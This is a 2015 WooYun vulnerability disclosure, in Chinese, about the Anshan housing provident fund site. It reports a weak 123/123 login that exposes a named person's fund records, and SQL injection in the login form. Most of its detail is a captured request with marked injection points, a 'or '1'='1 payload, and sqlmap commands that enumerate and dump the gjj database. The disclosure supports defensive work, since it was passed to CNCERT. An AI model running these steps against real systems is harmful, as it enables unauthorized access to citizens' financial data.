漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2015-0133483
漏洞标题:鞍山住房公积金管理中心用户登录存在弱用户+弱口令+SQL注射漏洞
相关厂商:鞍山住房公积金管理中心
漏洞作者: 毛毛虫
提交时间:2015-08-14 10:30
修复时间:2015-09-28 10:52
公开时间:2015-09-28 10:52
漏洞类型:SQL注射漏洞
危害等级:中
自评Rank:10
漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2015-08-14: 细节已通知厂商并且等待厂商处理中
2015-08-14: cncert国家互联网应急中心暂未能联系到相关单位,细节仅向通报机构公开
2015-08-24: 细节向核心白帽子及相关领域专家公开
2015-09-03: 细节向普通白帽子公开
2015-09-13: 细节向实习白帽子公开
2015-09-28: 细节向公众公开
简要描述:
辽宁省鞍山市住房公积金管理中心登录页面存在弱用户+弱口令+SQL注入漏洞,上次提交步骤不详细导致验证失败,审核小哥,辛苦你了,不好意思没写清楚,该漏洞确实存在,补充详细步骤,麻烦小哥重新审核一下啦!
详细说明:
1.弱用户+弱口令登录
URL地址:http://**.**.**.**/index/index.aspx
步骤1:【用户大厅】—【用户注册】页面中,用户名输入123,密码输入123,成功登录公积金个人账户。
步骤2:选择【公积金账户管理】可以成功查询到铁西办事处张玲的公积金缴费信息。
2.输入用户名和密码登录时,通过burpsuite抓取POST数据,在POST数据中的username和userpwd处标记注入点*
POST /about/searcharticle.aspx?keyword=%27or%271%27%3d%271 HTTP/1.1
Host: **.**.**.**
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:39.0) Gecko/20100101 Firefox/39.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://**.**.**.**/about/searcharticle.aspx?keyword=%27or%271%27%3d%271
Cookie: ASPSESSIONIDQSATDCSQ=AOILFKDBJGAHJOEHOOPFLBEL; CNZZDATA1252918829=1080461807-1438877596-http%253A%252F%252F**.**.**.**%252F%7C1438877596; _5t_trace_sid=4d940fbb83749357633ba32c418fccd1; _5t_trace_tms=1; ASP.NET_SessionId=t0j5kw4505wwr545b0vi3zvw
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 2596
__VIEWSTATE=%2FwEPDwUKMTIwMjE1NDkwOQ9kFgICAQ9kFgwCAw9kFgICAQ8WAh4JaW5uZXJodG1sBbYD44CA44CA5qC55o2u6L695a6B55yB55S16KeG55S16K%2Bd5Lya6K6u57K%2B56We77yM5Li65o6o6L%2Bb5oiR5biC5oi%2F5Zyw5Lqn5biC5Zy65bmz56iz5YGl5bq35Y%2BR5bGV77yM5L%2Bd6Zqc5L2P5oi%2F5YWs56ev6YeR57y05a2Y6ICF5ZCI5rOV5p2D55uK77yM5Zyo4oCc6Z6N5bGx5biC5L2P5oi%2F5YWs56ev6YeR5o%2BQ5Y%2BW566h55CG5pqC6KGM5Yqe5rOV4oCd55qE5Z%2B656GA5LiK77yM5oiR5biC6L%2Bb5LiA5q2l5pS%2B5a695L2P5oi%2F5YWs56ev6YeR5o%2BQ5Y%2BW5p2h5Lu277yM5Yeh5piv6LSt5Lmw5piO6L6%2B5ZWG5ZOB5L2P5oi%2F44CB5Yab5Lqn5L2P5oi%2F5Lul5Y%2BK6ZuG6LWE5bu65oi%2F5LiU5pyq5Lqr5Y%2BX5Yiw6LSt5oi%2F5o%2BQ5Y%2BW5L2%2F55So5YWs56ev6YeR55qE6IGM5bel77yM5q2k5qyh5Y%2Bv5Lul5o%2BQ5Y%2BW5L2P5oi%2F5YWs56ev6YeR6LSm5oi35a2Y5YKo5L2Z6aKd44CCZAIFDxYCHwAFFeWFs%2BmUruWtl%2B%2B8midvcicxJz0nMWQCBw88KwAJAQAPFgQeCERhdGFLZXlzFgAeC18hSXRlbUNvdW50AgpkFhRmD2QWAmYPFQMBNTTpno3lsbHluILnrbnpm4bkvY%2FmiL%2Flhaznp6%2Fph5Hov5E15Lq%2F5Yib5Y6G5Y%2By5paw6auYCjIwMTQtMDgtMjdkAgEPZBYCZg8VAwE3POmejeWxseW4gjEuMeS6v%2BS9j%2BaIv%2BWFrOenr%2BmHkeS%2FnemanOiBjOW3peKAnOS9j%2BacieaJgOWxheKAnQoyMDE0LTA4LTI3ZAICD2QWAmYPFQMBOC3osIPmga%2FmlrDmlL%2FvvJrkvY%2FmiL%2Flhaznp6%2Fph5HnmoTigJzliKnlpb3igJ0KMjAxNC0wOC0yN2QCAw9kFgJmDxUDATkw5L2P5oi%2F5YWs56ev6YeR6Z2i5Li05YmN5omA5pyq5pyJ55qE5Y%2BR5bGV5py66YGHCjIwMTQtMDgtMjdkAgQPZBYCZg8VAwIxMU7pno3lsbHluILkvY%2FmiL%2Flhaznp6%2Fph5HnrqHnkIbkuK3lv4PokL3lrp7igJzlhajkvJrigJ3nsr7npZ7nqoHlh7rkuIDkuKrph43ngrkKMjAxNC0wOC0yN2QCBQ9kFgJmDxUDAjEyTumejeWxseW4guS9j%2BaIv%2BWFrOenr%2BmHkeeuoeeQhuS4reW%2Fg%2BiQveWunuKAnOWFqOS8muKAneeyvuelnuaQnuWlveS4pOS4quWIm%2BW7ugoyMDE0LTA4LTI3ZAIGD2QWAmYPFQMCMjBZ5YWz5rOo5rCR55Sf5qC55pysICDmnoTlu7rlkozosJDkurrlsYUoMjAxMOW5tOeni%2BWto%2BaIv%2BS6pOS8muW4guS9j%2BaIv%2BWFrOenr%2BmHkeacieaUv%2BetlikKMjAxNC0wOS0wNGQCBw9kFgJmDxUDAjIxLeaIkeW4guiwg%2BaVtOS4quS6uuS9j%2BaIv%2BWFrOenr%2BmHkei0t%2BasvuWIqeeOhwoyMDE0LTA5LTA0ZAIID2QWAmYPFQMCMjIw5oiR5biC5LiK6LCD5Liq5Lq65L2P5oi%2F5YWs56ev6YeR5a2Y6LS35qy%2B5Yip546HCjIwMTQtMDktMDRkAgkPZBYCZg8VAwIyMzDmiJHluILkuIrosIPkuKrkurrkvY%2FmiL%2Flhaznp6%2Fph5HlrZjotLfmrL7liKnnjocKMjAxNC0wOS0wNGQCCQ8PFgIeBFRleHQFClBhZ2U6IDEvMjhkZAIPDw8WBB8DBQnkuIvkuIDpobUeC05hdmlnYXRlVXJsBTIvYWJvdXQvc2VhcmNoYXJ0aWNsZS5hc3B4P1BhZ2U9MiZrZXl3b3JkPSdvcicxJz0nMWRkAhEPDxYEHwMFBuacq%2BmhtR8EBTMvYWJvdXQvc2VhcmNoYXJ0aWNsZS5hc3B4P1BhZ2U9Mjgma2V5d29yZD0nb3InMSc9JzFkZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WAQUSbGVmdDEkSW1hZ2VCdXR0b24xUAzd9mixJFH3tLfGgdNzR%2B7%2FH%2FM%3D&__EVENTVALIDATION=%2FwEWBgKIgYWCBALpmoq1AgKa78TCCgKs65CWBwLwht75AwLb3M7HC3vabskDEiS5hR83Vtj5LGjBBvt8&left1%24username=1*&left1%24userpwd=1*&left1%24ImageButton1.x=22&left1%24ImageButton1.y=29
3.由于本站点post数据较大,故将该部分信息保存成txt文件,放到E盘根目录,如e:\asgjj.txt
4.通过sqlmap读取文件跑库,或直接通过命令跑库,步骤如下:
sqlmap.py -r e:\asgjj.txt -v 3 --dbs
或者
sqlmap.py -u "http://**.**.**.**/about/searcharticle.asp
x?keyword=%27or%271%27%3d%271" --data="__VIEWSTATE=%2FwEPDwUKMTIwMjE1NDkwOQ9kFgI
CAQ9kFgwCAw9kFgICAQ8WAh4JaW5uZXJodG1sBbYD44CA44CA5qC55o2u6L695a6B55yB55S16KeG55S
16K%2Bd5Lya6K6u57K%2B56We77yM5Li65o6o6L%2Bb5oiR5biC5oi%2F5Zyw5Lqn5biC5Zy65bmz56i
z5YGl5bq35Y%2BR5bGV77yM5L%2Bd6Zqc5L2P5oi%2F5YWs56ev6YeR57y05a2Y6ICF5ZCI5rOV5p2D5
5uK77yM5Zyo4oCc6Z6N5bGx5biC5L2P5oi%2F5YWs56ev6YeR5o%2BQ5Y%2BW566h55CG5pqC6KGM5Yq
e5rOV4oCd55qE5Z%2B656GA5LiK77yM5oiR5biC6L%2Bb5LiA5q2l5pS%2B5a695L2P5oi%2F5YWs56e
v6YeR5o%2BQ5Y%2BW5p2h5Lu277yM5Yeh5piv6LSt5Lmw5piO6L6%2B5ZWG5ZOB5L2P5oi%2F44CB5Ya
b5Lqn5L2P5oi%2F5Lul5Y%2BK6ZuG6LWE5bu65oi%2F5LiU5pyq5Lqr5Y%2BX5Yiw6LSt5oi%2F5o%2B
Q5Y%2BW5L2%2F55So5YWs56ev6YeR55qE6IGM5bel77yM5q2k5qyh5Y%2Bv5Lul5o%2BQ5Y%2BW5L2P5
oi%2F5YWs56ev6YeR6LSm5oi35a2Y5YKo5L2Z6aKd44CCZAIFDxYCHwAFFeWFs%2BmUruWtl%2B%2B8m
idvcicxJz0nMWQCBw88KwAJAQAPFgQeCERhdGFLZXlzFgAeC18hSXRlbUNvdW50AgpkFhRmD2QWAmYPF
QMBNTTpno3lsbHluILnrbnpm4bkvY%2FmiL%2Flhaznp6%2Fph5Hov5E15Lq%2F5Yib5Y6G5Y%2By5pa
w6auYCjIwMTQtMDgtMjdkAgEPZBYCZg8VAwE3POmejeWxseW4gjEuMeS6v%2BS9j%2BaIv%2BWFrOenr
%2BmHkeS%2FnemanOiBjOW3peKAnOS9j%2BacieaJgOWxheKAnQoyMDE0LTA4LTI3ZAICD2QWAmYPFQM
BOC3osIPmga%2FmlrDmlL%2FvvJrkvY%2FmiL%2Flhaznp6%2Fph5HnmoTigJzliKnlpb3igJ0KMjAxN
C0wOC0yN2QCAw9kFgJmDxUDATkw5L2P5oi%2F5YWs56ev6YeR6Z2i5Li05YmN5omA5pyq5pyJ55qE5Y%
2BR5bGV5py66YGHCjIwMTQtMDgtMjdkAgQPZBYCZg8VAwIxMU7pno3lsbHluILkvY%2FmiL%2Flhaznp
6%2Fph5HnrqHnkIbkuK3lv4PokL3lrp7igJzlhajkvJrigJ3nsr7npZ7nqoHlh7rkuIDkuKrph43ngrk
KMjAxNC0wOC0yN2QCBQ9kFgJmDxUDAjEyTumejeWxseW4guS9j%2BaIv%2BWFrOenr%2BmHkeeuoeeQh
uS4reW%2Fg%2BiQveWunuKAnOWFqOS8muKAneeyvuelnuaQnuWlveS4pOS4quWIm%2BW7ugoyMDE0LTA
4LTI3ZAIGD2QWAmYPFQMCMjBZ5YWz5rOo5rCR55Sf5qC55pysICDmnoTlu7rlkozosJDkurrlsYUoMjA
xMOW5tOeni%2BWto%2BaIv%2BS6pOS8muW4guS9j%2BaIv%2BWFrOenr%2BmHkeacieaUv%2BetlikKM
jAxNC0wOS0wNGQCBw9kFgJmDxUDAjIxLeaIkeW4guiwg%2BaVtOS4quS6uuS9j%2BaIv%2BWFrOenr%2
BmHkei0t%2BasvuWIqeeOhwoyMDE0LTA5LTA0ZAIID2QWAmYPFQMCMjIw5oiR5biC5LiK6LCD5Liq5Lq
65L2P5oi%2F5YWs56ev6YeR5a2Y6LS35qy%2B5Yip546HCjIwMTQtMDktMDRkAgkPZBYCZg8VAwIyMzD
miJHluILkuIrosIPkuKrkurrkvY%2FmiL%2Flhaznp6%2Fph5HlrZjotLfmrL7liKnnjocKMjAxNC0wO
S0wNGQCCQ8PFgIeBFRleHQFClBhZ2U6IDEvMjhkZAIPDw8WBB8DBQnkuIvkuIDpobUeC05hdmlnYXRlV
XJsBTIvYWJvdXQvc2VhcmNoYXJ0aWNsZS5hc3B4P1BhZ2U9MiZrZXl3b3JkPSdvcicxJz0nMWRkAhEPD
xYEHwMFBuacq%2BmhtR8EBTMvYWJvdXQvc2VhcmNoYXJ0aWNsZS5hc3B4P1BhZ2U9Mjgma2V5d29yZD0
nb3InMSc9JzFkZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WAQUSbGVmdDEkSW1hZ2V
CdXR0b24xUAzd9mixJFH3tLfGgdNzR%2B7%2FH%2FM%3D&__EVENTVALIDATION=%2FwEWBgKIgYWCBA
Lpmoq1AgKa78TCCgKs65CWBwLwht75AwLb3M7HC3vabskDEiS5hR83Vtj5LGjBBvt8&left1%24usern
ame=1*&left1%24userpwd=1*&left1%24ImageButton1.x=22&left1%24ImageButton1.y=29" -
v 3 --dbs
5.导出数据库gjj的所有表,步骤如下:
sqlmap.py -r e:\asgjj.txt -v 3 --dbs -D gjj --tables
或者
sqlmap.py -u "http://**.**.**.**/about/searcharticle.asp
x?keyword=%27or%271%27%3d%271" --data="__VIEWSTATE=%2FwEPDwUKMTIwMjE1NDkwOQ9kFgI
CAQ9kFgwCAw9kFgICAQ8WAh4JaW5uZXJodG1sBbYD44CA44CA5qC55o2u6L695a6B55yB55S16KeG55S
16K%2Bd5Lya6K6u57K%2B56We77yM5Li65o6o6L%2Bb5oiR5biC5oi%2F5Zyw5Lqn5biC5Zy65bmz56i
z5YGl5bq35Y%2BR5bGV77yM5L%2Bd6Zqc5L2P5oi%2F5YWs56ev6YeR57y05a2Y6ICF5ZCI5rOV5p2D5
5uK77yM5Zyo4oCc6Z6N5bGx5biC5L2P5oi%2F5YWs56ev6YeR5o%2BQ5Y%2BW566h55CG5pqC6KGM5Yq
e5rOV4oCd55qE5Z%2B656GA5LiK77yM5oiR5biC6L%2Bb5LiA5q2l5pS%2B5a695L2P5oi%2F5YWs56e
v6YeR5o%2BQ5Y%2BW5p2h5Lu277yM5Yeh5piv6LSt5Lmw5piO6L6%2B5ZWG5ZOB5L2P5oi%2F44CB5Ya
b5Lqn5L2P5oi%2F5Lul5Y%2BK6ZuG6LWE5bu65oi%2F5LiU5pyq5Lqr5Y%2BX5Yiw6LSt5oi%2F5o%2B
Q5Y%2BW5L2%2F55So5YWs56ev6YeR55qE6IGM5bel77yM5q2k5qyh5Y%2Bv5Lul5o%2BQ5Y%2BW5L2P5
oi%2F5YWs56ev6YeR6LSm5oi35a2Y5YKo5L2Z6aKd44CCZAIFDxYCHwAFFeWFs%2BmUruWtl%2B%2B8m
idvcicxJz0nMWQCBw88KwAJAQAPFgQeCERhdGFLZXlzFgAeC18hSXRlbUNvdW50AgpkFhRmD2QWAmYPF
QMBNTTpno3lsbHluILnrbnpm4bkvY%2FmiL%2Flhaznp6%2Fph5Hov5E15Lq%2F5Yib5Y6G5Y%2By5pa
w6auYCjIwMTQtMDgtMjdkAgEPZBYCZg8VAwE3POmejeWxseW4gjEuMeS6v%2BS9j%2BaIv%2BWFrOenr
%2BmHkeS%2FnemanOiBjOW3peKAnOS9j%2BacieaJgOWxheKAnQoyMDE0LTA4LTI3ZAICD2QWAmYPFQM
BOC3osIPmga%2FmlrDmlL%2FvvJrkvY%2FmiL%2Flhaznp6%2Fph5HnmoTigJzliKnlpb3igJ0KMjAxN
C0wOC0yN2QCAw9kFgJmDxUDATkw5L2P5oi%2F5YWs56ev6YeR6Z2i5Li05YmN5omA5pyq5pyJ55qE5Y%
2BR5bGV5py66YGHCjIwMTQtMDgtMjdkAgQPZBYCZg8VAwIxMU7pno3lsbHluILkvY%2FmiL%2Flhaznp
6%2Fph5HnrqHnkIbkuK3lv4PokL3lrp7igJzlhajkvJrigJ3nsr7npZ7nqoHlh7rkuIDkuKrph43ngrk
KMjAxNC0wOC0yN2QCBQ9kFgJmDxUDAjEyTumejeWxseW4guS9j%2BaIv%2BWFrOenr%2BmHkeeuoeeQh
uS4reW%2Fg%2BiQveWunuKAnOWFqOS8muKAneeyvuelnuaQnuWlveS4pOS4quWIm%2BW7ugoyMDE0LTA
4LTI3ZAIGD2QWAmYPFQMCMjBZ5YWz5rOo5rCR55Sf5qC55pysICDmnoTlu7rlkozosJDkurrlsYUoMjA
xMOW5tOeni%2BWto%2BaIv%2BS6pOS8muW4guS9j%2BaIv%2BWFrOenr%2BmHkeacieaUv%2BetlikKM
jAxNC0wOS0wNGQCBw9kFgJmDxUDAjIxLeaIkeW4guiwg%2BaVtOS4quS6uuS9j%2BaIv%2BWFrOenr%2
BmHkei0t%2BasvuWIqeeOhwoyMDE0LTA5LTA0ZAIID2QWAmYPFQMCMjIw5oiR5biC5LiK6LCD5Liq5Lq
65L2P5oi%2F5YWs56ev6YeR5a2Y6LS35qy%2B5Yip546HCjIwMTQtMDktMDRkAgkPZBYCZg8VAwIyMzD
miJHluILkuIrosIPkuKrkurrkvY%2FmiL%2Flhaznp6%2Fph5HlrZjotLfmrL7liKnnjocKMjAxNC0wO
S0wNGQCCQ8PFgIeBFRleHQFClBhZ2U6IDEvMjhkZAIPDw8WBB8DBQnkuIvkuIDpobUeC05hdmlnYXRlV
XJsBTIvYWJvdXQvc2VhcmNoYXJ0aWNsZS5hc3B4P1BhZ2U9MiZrZXl3b3JkPSdvcicxJz0nMWRkAhEPD
xYEHwMFBuacq%2BmhtR8EBTMvYWJvdXQvc2VhcmNoYXJ0aWNsZS5hc3B4P1BhZ2U9Mjgma2V5d29yZD0
nb3InMSc9JzFkZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WAQUSbGVmdDEkSW1hZ2V
CdXR0b24xUAzd9mixJFH3tLfGgdNzR%2B7%2FH%2FM%3D&__EVENTVALIDATION=%2FwEWBgKIgYWCBA
Lpmoq1AgKa78TCCgKs65CWBwLwht75AwLb3M7HC3vabskDEiS5hR83Vtj5LGjBBvt8&left1%24usern
ame=1*&left1%24userpwd=1*&left1%24ImageButton1.x=22&left1%24ImageButton1.y=29" -
v 3 --dbs -D gjj --tables
6.脱裤统计数据库gjj中的表统计数据,步骤如下:
sqlmap.py -r e:\asgjj.txt -v 3 --dbs -D gjj --tables --count
或者
sqlmap.py -u "http://**.**.**.**/about/searcharticle.asp
x?keyword=%27or%271%27%3d%271" --data="__VIEWSTATE=%2FwEPDwUKMTIwMjE1NDkwOQ9kFgI
CAQ9kFgwCAw9kFgICAQ8WAh4JaW5uZXJodG1sBbYD44CA44CA5qC55o2u6L695a6B55yB55S16KeG55S
16K%2Bd5Lya6K6u57K%2B56We77yM5Li65o6o6L%2Bb5oiR5biC5oi%2F5Zyw5Lqn5biC5Zy65bmz56i
z5YGl5bq35Y%2BR5bGV77yM5L%2Bd6Zqc5L2P5oi%2F5YWs56ev6YeR57y05a2Y6ICF5ZCI5rOV5p2D5
5uK77yM5Zyo4oCc6Z6N5bGx5biC5L2P5oi%2F5YWs56ev6YeR5o%2BQ5Y%2BW566h55CG5pqC6KGM5Yq
e5rOV4oCd55qE5Z%2B656GA5LiK77yM5oiR5biC6L%2Bb5LiA5q2l5pS%2B5a695L2P5oi%2F5YWs56e
v6YeR5o%2BQ5Y%2BW5p2h5Lu277yM5Yeh5piv6LSt5Lmw5piO6L6%2B5ZWG5ZOB5L2P5oi%2F44CB5Ya
b5Lqn5L2P5oi%2F5Lul5Y%2BK6ZuG6LWE5bu65oi%2F5LiU5pyq5Lqr5Y%2BX5Yiw6LSt5oi%2F5o%2B
Q5Y%2BW5L2%2F55So5YWs56ev6YeR55qE6IGM5bel77yM5q2k5qyh5Y%2Bv5Lul5o%2BQ5Y%2BW5L2P5
oi%2F5YWs56ev6YeR6LSm5oi35a2Y5YKo5L2Z6aKd44CCZAIFDxYCHwAFFeWFs%2BmUruWtl%2B%2B8m
idvcicxJz0nMWQCBw88KwAJAQAPFgQeCERhdGFLZXlzFgAeC18hSXRlbUNvdW50AgpkFhRmD2QWAmYPF
QMBNTTpno3lsbHluILnrbnpm4bkvY%2FmiL%2Flhaznp6%2Fph5Hov5E15Lq%2F5Yib5Y6G5Y%2By5pa
w6auYCjIwMTQtMDgtMjdkAgEPZBYCZg8VAwE3POmejeWxseW4gjEuMeS6v%2BS9j%2BaIv%2BWFrOenr
%2BmHkeS%2FnemanOiBjOW3peKAnOS9j%2BacieaJgOWxheKAnQoyMDE0LTA4LTI3ZAICD2QWAmYPFQM
BOC3osIPmga%2FmlrDmlL%2FvvJrkvY%2FmiL%2Flhaznp6%2Fph5HnmoTigJzliKnlpb3igJ0KMjAxN
C0wOC0yN2QCAw9kFgJmDxUDATkw5L2P5oi%2F5YWs56ev6YeR6Z2i5Li05YmN5omA5pyq5pyJ55qE5Y%
2BR5bGV5py66YGHCjIwMTQtMDgtMjdkAgQPZBYCZg8VAwIxMU7pno3lsbHluILkvY%2FmiL%2Flhaznp
6%2Fph5HnrqHnkIbkuK3lv4PokL3lrp7igJzlhajkvJrigJ3nsr7npZ7nqoHlh7rkuIDkuKrph43ngrk
KMjAxNC0wOC0yN2QCBQ9kFgJmDxUDAjEyTumejeWxseW4guS9j%2BaIv%2BWFrOenr%2BmHkeeuoeeQh
uS4reW%2Fg%2BiQveWunuKAnOWFqOS8muKAneeyvuelnuaQnuWlveS4pOS4quWIm%2BW7ugoyMDE0LTA
4LTI3ZAIGD2QWAmYPFQMCMjBZ5YWz5rOo5rCR55Sf5qC55pysICDmnoTlu7rlkozosJDkurrlsYUoMjA
xMOW5tOeni%2BWto%2BaIv%2BS6pOS8muW4guS9j%2BaIv%2BWFrOenr%2BmHkeacieaUv%2BetlikKM
jAxNC0wOS0wNGQCBw9kFgJmDxUDAjIxLeaIkeW4guiwg%2BaVtOS4quS6uuS9j%2BaIv%2BWFrOenr%2
BmHkei0t%2BasvuWIqeeOhwoyMDE0LTA5LTA0ZAIID2QWAmYPFQMCMjIw5oiR5biC5LiK6LCD5Liq5Lq
65L2P5oi%2F5YWs56ev6YeR5a2Y6LS35qy%2B5Yip546HCjIwMTQtMDktMDRkAgkPZBYCZg8VAwIyMzD
miJHluILkuIrosIPkuKrkurrkvY%2FmiL%2Flhaznp6%2Fph5HlrZjotLfmrL7liKnnjocKMjAxNC0wO
S0wNGQCCQ8PFgIeBFRleHQFClBhZ2U6IDEvMjhkZAIPDw8WBB8DBQnkuIvkuIDpobUeC05hdmlnYXRlV
XJsBTIvYWJvdXQvc2VhcmNoYXJ0aWNsZS5hc3B4P1BhZ2U9MiZrZXl3b3JkPSdvcicxJz0nMWRkAhEPD
xYEHwMFBuacq%2BmhtR8EBTMvYWJvdXQvc2VhcmNoYXJ0aWNsZS5hc3B4P1BhZ2U9Mjgma2V5d29yZD0
nb3InMSc9JzFkZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WAQUSbGVmdDEkSW1hZ2V
CdXR0b24xUAzd9mixJFH3tLfGgdNzR%2B7%2FH%2FM%3D&__EVENTVALIDATION=%2FwEWBgKIgYWCBA
Lpmoq1AgKa78TCCgKs65CWBwLwht75AwLb3M7HC3vabskDEiS5hR83Vtj5LGjBBvt8&left1%24usern
ame=1*&left1%24userpwd=1*&left1%24ImageButton1.x=22&left1%24ImageButton1.y=29" -
v 3 --dbs -D gjj --tables --count
具体表中的内容太多,就不一一脱裤了!
漏洞证明:
修复方案:
检查登录页面过滤注入点
版权声明:转载请注明来源 毛毛虫@乌云
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:11
确认时间:2015-08-14 10:51
厂商回复:
CNVD确认所述情况,已经转由CNCERT下发给相应分中心分中心,由其后续协调网站管理单位处置。
最新状态:
暂无